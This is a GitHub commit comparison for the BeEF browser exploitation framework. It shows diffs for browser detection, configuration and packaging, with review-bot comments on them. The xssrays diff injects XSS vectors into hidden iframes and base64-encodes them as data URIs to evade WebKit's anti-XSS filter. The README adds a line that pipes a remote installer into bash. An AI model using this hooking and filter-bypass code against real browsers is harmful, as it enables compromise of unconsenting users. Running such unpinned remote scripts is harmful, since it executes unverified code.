Compare commits

47 Commits

Author SHA1 Message Date
Ben Waugh
302bb27212 Revert 041ed2b47a27655cad360397b6ca43401a027504^..HEAD 2012-02-28 09:01:29 +10:00
Ben Waugh
041ed2b47a Jenkins Test Change 2012-02-28 07:32:02 +10:00
Wade Alcorn
df0458d62e Merge branch 'master' of github.com:beefproject/beef 2012-02-26 21:35:25 +10:00
Wade Alcorn
275bbfaad2 Updates to test jenkins 2012-02-26 21:35:03 +10:00
antisnatchor
e7dd04977e Added getPhysicalLocation module written by @keith55. Adjusted config.yaml description and browser support. 2012-02-26 09:53:16 +01:00
bcoles
b6ce0cf611 Updated Detect Firebug module description 2012-02-22 20:10:38 +10:30
bcoles
fd7cee3c5c Fixed typo in logger unit test 2012-02-22 19:07:07 +10:30
bcoles
b52c3d7d19 Added unit test stubs for proxy, requester and event logger extensions.
Fixes issue #29
Fixes issue #30
Fixes issue #33

Created a unit test stub for logger (as opposed to event_logger) to
differentiate between the main Logs tab and the event logs for each
zombie.
2012-02-22 19:00:48 +10:30
Wade Alcorn
ec48e2647f Minor update to trigger test server 2012-02-21 06:08:15 +10:00
Wade Alcorn
5118429cb5 Overkill test for test server 2012-02-20 21:02:46 +10:00
Wade Alcorn
d010bd6d9e Extend wait time between login tests 2012-02-20 17:46:12 +10:00
bcoles
cda1659356 Improved proxy error handling. Fixes issue #92.
The proxy now dies somewhat gracefully when given a malformed request.

The `Content-Length' header is now only matched by the parser if its
value is an integer.

A request with a null or missing HTTP version in the header now defaults
to HTTP/1.0

A request with a null or missing `Host' header returns:
  `ERROR: CrossDomain Request. The request was not sent.'
regardless of whether the host is specified in the URL.
2012-02-19 03:42:20 +10:30
bcoles
d50b07ac56 Added Unhook module. Fixes issue #525. 2012-02-18 19:10:02 +10:30
bcoles
a9e276f50a Added Detect Firebug module. Fixes issue 497
Moved Detect Software module from Browser to Host category
2012-02-18 17:43:20 +10:30
Christian Frichot
791b34863e Renamed / tidied up some of the config. See Issue #82 2012-02-18 10:06:47 +08:00
Mike Haworth
fd15c108a2 Merge branch 'master' of github.com:beefproject/beef 2012-02-18 14:17:34 +13:00
Mike Haworth
5e138395d4 Partial fix for issue #100, now detects build version of flash 2012-02-18 14:17:12 +13:00
Christian Frichot
15932efcb3 Made some minor adjustments to 'os' key rating in core/module.rb. See issue #72 2012-02-18 09:06:46 +08:00
Mike Haworth
106e2dbd2d added detect software module 2012-02-18 12:22:17 +13:00
Wade Alcorn
56a9c4d04d Changed version number 2012-02-16 20:30:48 +10:00
Wade Alcorn
55b80d3b6d Merge branch 'master' of github.com:beefproject/beef 2012-02-16 08:23:39 +10:00
bcoles
8ecfa3578f Merge branch 'master' of https://github.com/beefproject/beef 2012-02-16 02:52:38 +10:30
antisnatchor
2715e0400c added browser type,version and OS to console output when a new browser is hooked in BeEF 2012-02-15 16:01:47 +01:00
Ben
667d00351d Updated README instructions for MAC OS X 2012-02-15 16:01:46 +01:00
Ben
3ad2dbb3c7 Rake task to generate DMG image 2012-02-15 16:01:46 +01:00
antisnatchor
5bc6745e03 Fixed issue 66: base64'ed the iframe src in case of Chrome/Safari to bypass the webkit anti-XSS filter 2012-02-15 16:01:46 +01:00
antisnatchor
58f2b4f7a1 Added detection of Chrome 17 2012-02-15 16:01:45 +01:00
bcoles
e5aa0671a1 Removed "notes:" node from three module config.yaml files 2012-02-15 16:01:45 +01:00
Christian Frichot
4a92d3174c Removed extended_in_modules code. See Issue #147 2012-02-15 16:01:45 +01:00
antisnatchor
61763ff103 commented out require of selenium gem. not needed and throws errors on Mac OSX 2012-02-15 16:01:45 +01:00
Saafan
e8d7293350 Listening to loopback only. Fixes issue #594 2012-02-15 16:01:44 +01:00
bcoles
805e8c8af1 Added fingerprints to Fingerprint Network module 2012-02-15 16:01:44 +01:00
Wade Alcorn
1d7ad568d2 Minor formatting update 2012-02-15 16:01:44 +01:00
antisnatchor
9489e3c591 moved imap ipec modules in a proper directory, added a note to imap ipec module about portbanning. 2012-02-15 16:01:43 +01:00
antisnatchor
d9104b93f4 removed console.log function calls that were throwing errors on IE 2012-02-15 16:01:23 +01:00
antisnatchor
55b52427e8 re-added panel.removeAll when generating a newExploitPanel, corrected typo on function name genExistingExploitPanel 2012-02-15 16:00:57 +01:00
antisnatchor
1d74d7eeab Fixed a serious bug in beef.net.request when sending cross-domain POST data. jQuery is automatically changing the method to GET if the dataType (that was hardcoded in our code) is set to 'script'. 2012-02-15 16:00:38 +01:00
antisnatchor
74d176ff73 Fixed issue 34: now only one zombie tab is created (current browser). When switching between browsers, the previous zombiePanel is destroyed. 2012-02-15 16:00:14 +01:00
Ben
def8677f1c Updated README instructions for MAC OS X 2012-02-15 17:52:54 +10:00
Ben
02bed661bb Rake task to generate DMG image 2012-02-15 17:52:08 +10:00
antisnatchor
c6988befc5 Fixed issue 66: base64'ed the iframe src in case of Chrome/Safari to bypass the webkit anti-XSS filter 2012-02-12 13:45:35 +01:00
antisnatchor
aefd251c17 Added detection of Chrome 17 2012-02-12 11:49:38 +01:00
bcoles
591cef0732 Removed "notes:" node from three module config.yaml files 2012-02-09 23:01:14 +10:30
Christian Frichot
0178a41676 Removed extended_in_modules code. See Issue #147 2012-02-07 21:24:02 +08:00
antisnatchor
476c2d0636 commented out require of selenium gem. not needed and throws errors on Mac OSX 2012-02-07 02:03:34 +01:00
Saafan
f20fd9e797 Listening to loopback only. Fixes issue #594 2012-02-06 12:00:08 +02:00
bcoles
ec0dacce28 Added fingerprints to Fingerprint Network module 2012-02-01 23:11:05 +10:30
87 changed files with 1252 additions and 421 deletions

9
README

@@ -53,8 +53,13 @@ Most of the contents of this file will eventually be added to /install.rb. In th
4. Prerequisites (Mac OSX)
Make sure you have XCode installed - which provided the sqlite support BeEF needs
Sqlite support is native in MacOS 10.6+
- XCode: provides the sqlite support BeEF needs
- Ruby 1.9
To install RVM and Ruby 1.9.3 on Mac OS:
$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
$ rvm install 1.9.3-p0 --with-gcc=clang
$ rvm use 1.9.3
5. Install instructions
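Review bot: The RVM install line pipes a script fetched from the `master` branch straight into `bash`, and `curl -s` hides any download error, so the README tells users to run unpinned, unverified remote code. Suggest pointing at a tagged release of the installer, or having the user download it to a file first so it can be inspected before it runs. `source ~/.bash_profile` also sits on the same line as the installer command; it should be its own step.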

@@ -135,3 +135,20 @@ file '/tmp/msf-test/msfconsole' do
sh "cd test;git clone https://github.com/rapid7/metasploit-framework.git /tmp/msf-test"
end
################################
# Create Mac DMG File
task :dmg do
puts "\nCreating Working Directory\n";
sh "mkdir dmg";
sh "mkdir dmg/BeEF";
sh "rsync * dmg/BeEF --exclude=dmg -r";
sh "ln -s /Applications dmg/";
puts "\nCreating DMG File\n"
sh "hdiutil create ./BeEF.dmg -srcfolder dmg -volname BeEF -ov";
puts "\nCleaning Up\n"
sh "rm -r dmg";
puts "\nBeEF.dmg created\n"
end
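Review bot: `rsync * dmg/BeEF --exclude=dmg -r` in the `:dmg` task copies everything in the working directory into the image, so whatever local files sit in the checkout at build time ship in BeEF.dmg. Suggest building from a clean export or an explicit include list. The task also has no cleanup on failure: if `hdiutil create` fails, `dmg/` is left behind and the next run stops at `mkdir dmg`; `mkdir -p` and an `ensure` block around the cleanup would cover that.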

@@ -14,4 +14,4 @@
# limitations under the License.
#
0.4.3.1-alpha
0.4.3.2-alpha

2
beef

@@ -24,7 +24,7 @@ if RUBY_VERSION < '1.9'
puts "\n"
puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later."
puts "OSX:"
puts "sudo port install ruby19 +nosuffix"
puts "See Readme"
puts "\n"
exit
end

@@ -16,7 +16,7 @@
# BeEF Configuration file
beef:
version: '0.4.3.1-alpha'
version: '0.4.3.2-alpha'
debug: false
restrictions:

@@ -286,12 +286,20 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==16)?true:false);
},
/**
* Returns true if Chrome 17.
* @example: beef.browser.isC17()
*/
isC17: function() {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function() {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17();
},
/**
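Review bot: `isC()` still enumerates every known release, so Chrome 18 and later will report as not Chrome until another `isC18()` is added and wired in here. Suggest parsing the major version once from `navigator.appVersion` and having `isC()` test only for Chrome itself. In `isC17()`, `match(...)[1]` throws a TypeError when `window.chrome` is set but the regex does not match, and the trailing `?true:false` is redundant.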
@@ -355,6 +363,7 @@ beef.browser = {
C14: this.isC14(), // Chrome 14
C15: this.isC15(), // Chrome 15
C16: this.isC16(), // Chrome 16
C17: this.isC17(), // Chrome 16
C: this.isC(), // Chrome any version
FF2: this.isFF2(), // Firefox 2
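Review bot: The trailing comment on the new `C17: this.isC17()` entry says `// Chrome 16`; it should read `// Chrome 17`.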
@@ -408,6 +417,7 @@ beef.browser = {
if (this.isC14()) { return '14' }; // Chrome 14
if (this.isC15()) { return '15' }; // Chrome 15
if (this.isC16()) { return '16' }; // Chrome 16
if (this.isC17()) { return '17' }; // Chrome 17
if (this.isFF2()) { return '2' }; // Firefox 2
@@ -564,8 +574,7 @@ beef.browser = {
'control':'ShockwaveFlash.ShockwaveFlash',
'return': function(control) {
version = control.getVariable('$version').substring(4);
version = version.split(',');
return 'Flash Player v'+parseFloat(version[0]+'.'+version[1]);
return 'Flash Player v'+version.replace(/,/g, ".");
}},
'Quicktime':{
'control': 'QuickTime.QuickTime',
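Review bot: `version` in the Flash `return` callback is assigned without `var`, so it becomes a global; declare it locally while this function is being changed. `substring(4)` also assumes a four-character prefix in `$version`, which deserves a one-line comment.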

@@ -168,9 +168,22 @@ beef.net = {
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST"){
$j.ajaxSetup({
dataType: dataType
});
}else{ //GET, HEAD, ...
$j.ajaxSetup({
dataType: 'script'
});
}
//build and execute the request
$j.ajax({type: method,
dataType: 'script', // this is required for bugs in IE so data can be transferred back to the server
url: url,
data: data,
timeout: (timeout * 1000),
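Review bot: `$j.ajaxSetup({dataType: ...})` changes jQuery's global defaults, so the value chosen for this request stays in effect for every later `$j.ajax` call that does not set its own `dataType`. Suggest computing the value in a local variable (`dataType` for POST, `'script'` otherwise) and passing it as the `dataType` option of the `$j.ajax` call below. The comment above the branch would also read better if it said outright that `dataType: 'script'` makes jQuery turn cross-domain POSTs into GETs.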

@@ -308,7 +308,10 @@ beef.net.xssrays = {
var ray = this.rays[beef.net.xssrays.uniqueID];
var paramsPos = 0;
if (params != null) { // check for XSS in GET parameters
if (params != null) {
/*
* ++++++++++ check for XSS in URI parameters (GET) ++++++++++
*/
for (var i in params) {
if (params.hasOwnProperty(i)) {
@@ -328,12 +331,19 @@ beef.net.xssrays = {
exploit = vector.input.replace(/XSS/g, beefCallback);
url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
if(beef.browser.isC() || beef.browser.isS()){ //we will base64 the whole uri later
url += i + '=' + exploit + '&';
}else{
url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
}
paramsPos++;
}
}
} else { // check for XSS in GET URL path
} else {
/*
* ++++++++++ check for XSS in URI path (GET) ++++++++++
*/
var filename = beef.net.xssrays.fileName(url);
poc = vector.input.replace(/XSS/g, "alert(1)");
@@ -352,8 +362,9 @@ beef.net.xssrays = {
//TODO: this need to checked and the slash shouldn't be added in this particular case
url = url.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');
}
/*
* ++++++++++ create the iFrame that will contain the attack vector ++++++++++
*/
var iframe = document.createElement('iframe');
iframe.style.display = 'none';
iframe.id = 'ray' + beef.net.xssrays.uniqueID;
@@ -361,10 +372,18 @@ beef.net.xssrays = {
iframe.name = 'ray' + Math.random().toString();
if (method === 'GET') {
iframe.src = url;
if(beef.browser.isC() || beef.browser.isS()){
var datauri = btoa(url);
iframe.src = "data:text/html;base64," + datauri;
}else{
iframe.src = url;
}
document.body.appendChild(iframe);
beef.net.xssrays.printDebug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
} else if (method === 'POST') {
/*
* ++++++++++ check for XSS in body parameters (POST) ++++++++++
*/
var form = '<form action="' + beef.net.xssrays.escape(action) + '" method="post" id="frm">';
poc = '';
pocurl = action + "?";

@@ -15,208 +15,199 @@
#
module BeEF
module Core
module Core
# @note This module contains a list of utils functions to use when writing commands
module CommandUtils
# Format a string to support multiline in javascript.
# @param [String] text String to convert
# @return [String] Formatted string
def format_multiline(text); text.gsub(/\n/, '\n'); end
end
# @note This module contains a list of utils functions to use when writing commands
module CommandUtils
# Format a string to support multiline in javascript.
# @param [String] text String to convert
# @return [String] Formatted string
def format_multiline(text); text.gsub(/\n/, '\n'); end
# @note The Command Module Context is being used when evaluating code in eruby.
# In other words, we use that code to add funky functions to the
# javascript templates of our commands.
class CommandContext < Erubis::Context
include BeEF::Core::CommandUtils
# Constructor
# @param [Hash] hash
def initialize(hash=nil);
super(hash);
end
end
# @note This class is the base class for all command modules in the framework.
# Two instances of this object are created during the execution of command module.
class Command
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
attr_accessor :zombie, :command_id, :session_id
include BeEF::Core::CommandUtils
include BeEF::Core::Constants::Browsers
include BeEF::Core::Constants::CommandModule
# Super class controller
# @param [String] key command module key
def initialize(key)
get_extensions
config = BeEF::Core::Configuration.instance
@key = key
@datastore = {}
@friendlyname = config.get("beef.module.#{key}.name")
@output = ''
@path = config.get("beef.module.#{key}.path")
@default_command_url = config.get("beef.module.#{key}.mount")
@id = config.get("beef.module.#{key}.db.id")
@auto_update_zombie = false
@results = {}
@beefjs_components = {}
end
# Uses the API to include all the code from extensions that need to add methods, constants etc to that class.
# @todo Determine if this method is deprecated
def get_extensions
BeEF::API::Command.extended_in_modules.each do |mod|
self.class.send(:include, mod)
# @note The Command Module Context is being used when evaluating code in eruby.
# In other words, we use that code to add funky functions to the
# javascript templates of our commands.
class CommandContext < Erubis::Context
include BeEF::Core::CommandUtils
# Constructor
# @param [Hash] hash
def initialize(hash=nil);
super(hash);
end
end
# This function is called just before the instructions are sent to hooked browser.
def pre_send; end
# Callback method. This function is called when the hooked browser sends results back.
def callback; end
# If the command requires some data to be sent back, this function will process them.
# @param [] head
# @param [Hash] params Hash of parameters
# @todo Determine argument "head" type
def process_zombie_response(head, params); end
# Returns true if the command needs configurations to work. False if not.
# @deprecated This command should not be used since the implementation of the new configuration system
def needs_configuration?; !@datastore.nil?; end
# Returns information about the command in a JSON format.
# @return [String] JSON formatted string
def to_json
{
'Name' => @friendlyname,
'Description' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.description"),
'Category' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.category"),
'Data' => BeEF::Module.get_options(@key)
}.to_json
end
# Builds the 'datastore' attribute of the command which is used to generate javascript code.
# @param [Hash] data Data to be inserted into the datastore
# @todo Confirm argument "data" type
def build_datastore(data);
@datastore = JSON.parse(data)
end
# Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
# @param [Hash] http_params HTTP parameters
# @param [Hash] http_headers HTTP headers
def build_callback_datastore(http_params, http_headers)
@datastore = {'http_headers' => {}} # init the datastore
# get, check and add the http_params to the datastore
http_params.keys.each { |http_params_key|
(print_error 'http_params_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_params_key)
http_params_value = Erubis::XmlHelper.escape_xml(http_params[http_params_key])
(print_error 'http_params_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_params_value)
@datastore[http_params_key] = http_params_value # add the checked key and value to the datastore
}
# get, check and add the http_headers to the datastore
http_headers.keys.each { |http_header_key|
(print_error 'http_header_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_header_key)
http_header_value = Erubis::XmlHelper.escape_xml(http_headers[http_header_key][0])
(print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
@datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
}
end
# Returns the output of the command. These are the actual instructions sent to the browser.
# @return [String] The command output
def output
# @note This class is the base class for all command modules in the framework.
# Two instances of this object are created during the execution of command module.
class Command
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
attr_accessor :zombie, :command_id, :session_id
include BeEF::Core::CommandUtils
include BeEF::Core::Constants::Browsers
include BeEF::Core::Constants::CommandModule
# Super class controller
# @param [String] key command module key
def initialize(key)
config = BeEF::Core::Configuration.instance
@key = key
@datastore = {}
@friendlyname = config.get("beef.module.#{key}.name")
@output = ''
@path = config.get("beef.module.#{key}.path")
@default_command_url = config.get("beef.module.#{key}.mount")
@id = config.get("beef.module.#{key}.db.id")
@auto_update_zombie = false
@results = {}
@beefjs_components = {}
end
# This function is called just before the instructions are sent to hooked browser.
def pre_send; end
# Callback method. This function is called when the hooked browser sends results back.
def callback; end
# If the command requires some data to be sent back, this function will process them.
# @param [] head
# @param [Hash] params Hash of parameters
# @todo Determine argument "head" type
def process_zombie_response(head, params); end
# Returns true if the command needs configurations to work. False if not.
# @deprecated This command should not be used since the implementation of the new configuration system
def needs_configuration?; !@datastore.nil?; end
# Returns information about the command in a JSON format.
# @return [String] JSON formatted string
def to_json
{
'Name' => @friendlyname,
'Description' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.description"),
'Category' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.category"),
'Data' => BeEF::Module.get_options(@key)
}.to_json
end
# Builds the 'datastore' attribute of the command which is used to generate javascript code.
# @param [Hash] data Data to be inserted into the datastore
# @todo Confirm argument "data" type
def build_datastore(data);
@datastore = JSON.parse(data)
end
# Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
# @param [Hash] http_params HTTP parameters
# @param [Hash] http_headers HTTP headers
def build_callback_datastore(http_params, http_headers)
@datastore = {'http_headers' => {}} # init the datastore
# get, check and add the http_params to the datastore
http_params.keys.each { |http_params_key|
(print_error 'http_params_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_params_key)
http_params_value = Erubis::XmlHelper.escape_xml(http_params[http_params_key])
(print_error 'http_params_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_params_value)
@datastore[http_params_key] = http_params_value # add the checked key and value to the datastore
}
# get, check and add the http_headers to the datastore
http_headers.keys.each { |http_header_key|
(print_error 'http_header_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_header_key)
http_header_value = Erubis::XmlHelper.escape_xml(http_headers[http_header_key][0])
(print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
@datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
}
end
# Returns the output of the command. These are the actual instructions sent to the browser.
# @return [String] The command output
def output
f = @path+'command.js'
(print_error "#{f} file does not exist";return) if not File.exists? f
command = BeEF::Core::Models::Command.first(:id => @command_id)
@eruby = Erubis::FastEruby.new(File.read(f))
@eruby = Erubis::FastEruby.new(File.read(f))
data = BeEF::Core::Configuration.instance.get("beef.module.#{@key}")
cc = BeEF::Core::CommandContext.new
cc['command_url'] = @default_command_url
cc['command_id'] = @command_id
JSON.parse(command['data']).each{|v|
cc[v['name']] = v['value']
cc[v['name']] = v['value']
}
if self.respond_to?(:execute)
self.execute
self.execute
end
@output = @eruby.evaluate(cc)
@output
end
# Saves the results received from the hooked browser
# @param [Hash] results Results from hooked browser
def save(results)
@results = results
end
# If nothing else than the file is specified, the function will map the file to a random path without any extension.
# @param [String] file File to be mounted
# @param [String] path URL path to mounted file
# @param [String] extension URL extension
# @param [Integer] count The amount of times this file can be accessed before being automatically unmounted
# @deprecated This function is possibly deprecated in place of the API
def map_file_to_url(file, path=nil, extension=nil, count=1)
return BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
end
# Tells the framework to load a specific module of the BeEFJS library that the command will be using.
# @param [String] component String of BeEFJS component to load
# @note Example: use 'beef.net.local'
def use(component)
return if @beefjs_components.include? component
component_path = '/'+component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
raise "Invalid beefjs component for command module #{@path}" if not File.exists?(component_path)
@beefjs_components[component] = component_path
end
@output
end
# @todo Document
def oc_value(name)
# Saves the results received from the hooked browser
# @param [Hash] results Results from hooked browser
def save(results)
@results = results
end
# If nothing else than the file is specified, the function will map the file to a random path without any extension.
# @param [String] file File to be mounted
# @param [String] path URL path to mounted file
# @param [String] extension URL extension
# @param [Integer] count The amount of times this file can be accessed before being automatically unmounted
# @deprecated This function is possibly deprecated in place of the API
def map_file_to_url(file, path=nil, extension=nil, count=1)
return BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
end
# Tells the framework to load a specific module of the BeEFJS library that the command will be using.
# @param [String] component String of BeEFJS component to load
# @note Example: use 'beef.net.local'
def use(component)
return if @beefjs_components.include? component
component_path = '/'+component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
raise "Invalid beefjs component for command module #{@path}" if not File.exists?(component_path)
@beefjs_components[component] = component_path
end
# @todo Document
def oc_value(name)
option = BeEF::Core::Models::OptionCache.first(:name => name)
return nil if not option
return option.value
end
return nil if not option
return option.value
end
# @todo Document
def apply_defaults()
@datastore.each { |opt|
opt["value"] = oc_value(opt["name"]) || opt["value"]
}
end
private
@use_template
@eruby
@update_zombie
@results
end
# @todo Document
def apply_defaults()
@datastore.each { |opt|
opt["value"] = oc_value(opt["name"]) || opt["value"]
}
end
private
@use_template
@eruby
@update_zombie
@results
end
end
end
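Review bot: The removal of `get_extensions` and its call in `Command#initialize` is buried in a whole-file re-indent, which makes the one functional change hard to spot; suggest putting the whitespace change in its own commit. While these lines are open: in `build_callback_datastore`, a failed key or value check does `return` from inside the `each` block, which leaves `@datastore` partly filled with the entries that passed before it; resetting it on failure would make the outcome unambiguous. In `use`, the pattern `/beef./` has an unescaped dot and no anchor, so it strips "beef" plus any following character wherever it appears in the component name.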

@@ -15,115 +15,115 @@
#
module BeEF
module Core
module Core
class Configuration
include Singleton
# Loads the default configuration system
# @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
def initialize(configuration_file="#{$root_dir}/config.yaml")
# argument type checking
raise Exception::TypeError, '"configuration_file" needs to be a string' if not configuration_file.string?
# test to make sure file exists
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(configuration_file)
begin
#open base config
@config = self.load(configuration_file)
# set default value if key? does not exist
@config.default = nil
rescue Exception => e
print_error "Fatal Error: cannot load configuration file"
print_debug e
class Configuration
include Singleton
# Loads the default configuration system
# @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
def initialize(configuration_file="#{$root_dir}/config.yaml")
# argument type checking
raise Exception::TypeError, '"configuration_file" needs to be a string' if not configuration_file.string?
# test to make sure file exists
raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(configuration_file)
begin
#open base config
@config = self.load(configuration_file)
# set default value if key? does not exist
@config.default = nil
rescue Exception => e
print_error "Fatal Error: cannot load configuration file"
print_debug e
end
end
end
# Loads yaml file
# @param [String] file YAML file to be loaded
# @return [Hash] YAML formatted hash
def load(file)
begin
return nil if not File.exists?(file)
raw = File.read(file)
return YAML.load(raw)
rescue Exception => e
print_debug "Unable to load '#{file}' #{e}"
return nil
# Loads yaml file
# @param [String] file YAML file to be loaded
# @return [Hash] YAML formatted hash
def load(file)
begin
return nil if not File.exists?(file)
raw = File.read(file)
return YAML.load(raw)
rescue Exception => e
print_debug "Unable to load '#{file}' #{e}"
return nil
end
end
end
# Returns the value of a selected key in the configuration file.
# @param [String] key Key of configuration item
# @return [Hash|String] The resulting value stored against the 'key'
def get(key)
# Returns the value of a selected key in the configuration file.
# @param [String] key Key of configuration item
# @return [Hash|String] The resulting value stored against the 'key'
def get(key)
subkeys = key.split('.')
lastkey = subkeys.pop
subhash = subkeys.inject(@config) do |hash, k|
hash[k]
hash[k]
end
return (subhash != nil and subhash.has_key?(lastkey)) ? subhash[lastkey] : nil
end
return (subhash != nil and subhash.has_key?(lastkey)) ? subhash[lastkey] : nil
end
# Sets the give key value pair to the config instance
# @param [String] key The configuration key
# @param value The value to be stored against the 'key'
# @return [Boolean] If the store procedure was successful
def set(key, value)
# Sets the give key value pair to the config instance
# @param [String] key The configuration key
# @param value The value to be stored against the 'key'
# @return [Boolean] If the store procedure was successful
def set(key, value)
subkeys = key.split('.').reverse
return false if subkeys.length == 0
hash = {subkeys.shift.to_s => value}
subkeys.each{|v|
hash = {v.to_s => hash}
hash = {v.to_s => hash}
}
@config = @config.deep_merge(hash)
return true
end
end
# Clears the given key hash
# @param [String] key Configuration key to be cleared
# @return [Boolean] If the configuration key was cleared
def clear(key)
# Clears the given key hash
# @param [String] key Configuration key to be cleared
# @return [Boolean] If the configuration key was cleared
def clear(key)
subkeys = key.split('.')
return false if subkeys.length == 0
lastkey = subkeys.pop
hash = @config
subkeys.each{|v|
hash = hash[v]
hash = hash[v]
}
return (hash.delete(lastkey) == nil) ? false : true
end
return (hash.delete(lastkey) == nil) ? false : true
end
# Load extensions configurations
def load_extensions_config
# Load extensions configurations
def load_extensions_config
self.set('beef.extension', {})
Dir.glob("#{$root_dir}/extensions/*/config.yaml") do | cf |
y = self.load(cf)
if y != nil
y['beef']['extension'][y['beef']['extension'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
else
print_error "Unable to load extension configuration '#{cf}'"
end
y = self.load(cf)
if y != nil
y['beef']['extension'][y['beef']['extension'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
else
print_error "Unable to load extension configuration '#{cf}'"
end
end
end
end
# Load module configurations
def load_modules_config
# Load module configurations
def load_modules_config
self.set('beef.module', {})
Dir.glob("#{$root_dir}/modules/**/*/config.yaml") do | cf |
y = self.load(cf)
if y != nil
y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
# API call for post module config load
BeEF::API::Registrar.instance.fire(BeEF::API::Configuration, 'module_configuration_load', y['beef']['module'].keys.first)
else
print_error "Unable to load module configuration '#{cf}'"
end
y = self.load(cf)
if y != nil
y['beef']['module'][y['beef']['module'].keys.first]['path'] = cf.gsub(/config\.yaml/, '').gsub(/#{$root_dir}\//, '')
@config = y.deep_merge(@config)
# API call for post module config load
BeEF::API::Registrar.instance.fire(BeEF::API::Configuration, 'module_configuration_load', y['beef']['module'].keys.first)
else
print_error "Unable to load module configuration '#{cf}'"
end
end
end
end
end
end
end
end
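Review bot: `initialize` rescues `Exception`, prints "Fatal Error: cannot load configuration file" and then carries on, so a failed load leaves `@config` unset and the next `get` on a dotted key fails with a less useful error. Since these lines are being re-indented anyway, suggest re-raising or exiting after logging, and rescuing `StandardError` rather than `Exception`. Separately, `load` passes every `extensions/*/config.yaml` and `modules/**/*/config.yaml` through `YAML.load`; a comment stating that these files are treated as trusted input would help.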

@@ -208,10 +208,13 @@ module BeEF
case v
when String
if opts['browser'] == v
# if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
# rating += 1
# end
results << {'rating' => 2, 'const' => k}
end
when Hash
if opts['browser'] == v.keys.first
if opts['browser'] == v.keys.first or v.keys.first == BeEF::Core::Constants::Browsers::ALL
subv = v[v.keys.first]
rating = 1
#version check
@@ -241,14 +244,15 @@ module BeEF
rating += 1
match = true
elsif subv['os'] == BeEF::Core::Constants::Os::OS_ALL_UA_STR
rating += 1
match = true
end
when Array
subv['os'].each{|p|
if o == p or p == BeEF::Core::Constants::Os::OS_ALL_UA_STR
if o == p
rating += 1
match = true
elsif p == BeEF::Core::Constants::Os::OS_ALL_UA_STR
match = true
end
}
end
@@ -257,18 +261,35 @@ module BeEF
break
end
end
if rating != 1
if rating > 0
# if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
# rating += 1
# end
results << {'rating' => rating, 'const' => k}
end
end
end
if v == BeEF::Core::Constants::Browsers::ALL
results << {'rating' => 1, 'const' => k}
rating = 1
if k == BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
rating = 1
end
results << {'rating' => rating, 'const' => k}
end
}
}
if results.count > 0
return results.sort_by {|v| v['rating']}.last['const']
result = {}
results.each {|r|
if result == {}
result = {'rating' => r['rating'], 'const' => r['const']}
else
if r['rating'] > result['rating']
result = {'rating' => r['rating'], 'const' => r['const']}
end
end
}
return result['const']
else
return BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN
end
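
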